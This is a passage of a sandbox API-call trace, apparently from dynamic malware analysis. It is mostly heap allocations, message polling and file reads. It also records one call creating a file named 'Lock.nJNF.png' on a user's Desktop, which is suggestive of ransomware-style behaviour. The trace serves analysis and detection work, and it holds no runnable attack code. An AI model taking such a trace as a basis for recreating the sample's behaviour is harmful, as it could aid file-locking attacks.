dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0188.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.196] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0188.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0188.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0188.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.196] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.nJNF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.njnf.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0188.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.197] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.197] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0188.198] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0188.198] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0188.200] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0188.200] ReadFile (in: hFile=0x2ac, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x3776, lpOverlapped=0x0) returned 1 [0188.201] ReadFile (in: hFile=0x2ac, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0188.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0188.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3776) returned 0x34a2048 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3776) returned 0x34a57c8 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.203] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3776) returned 0x34a2048 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.203] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0188.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0188.204] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0188.204] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0188.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0188.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3776) returned 0x34a2048 [0188.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0188.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0188.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0188.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3776) returned 0x24d7a58 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0188.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0188.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.207] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0188.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0188.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0188.208] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.208] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0188.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0188.209] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 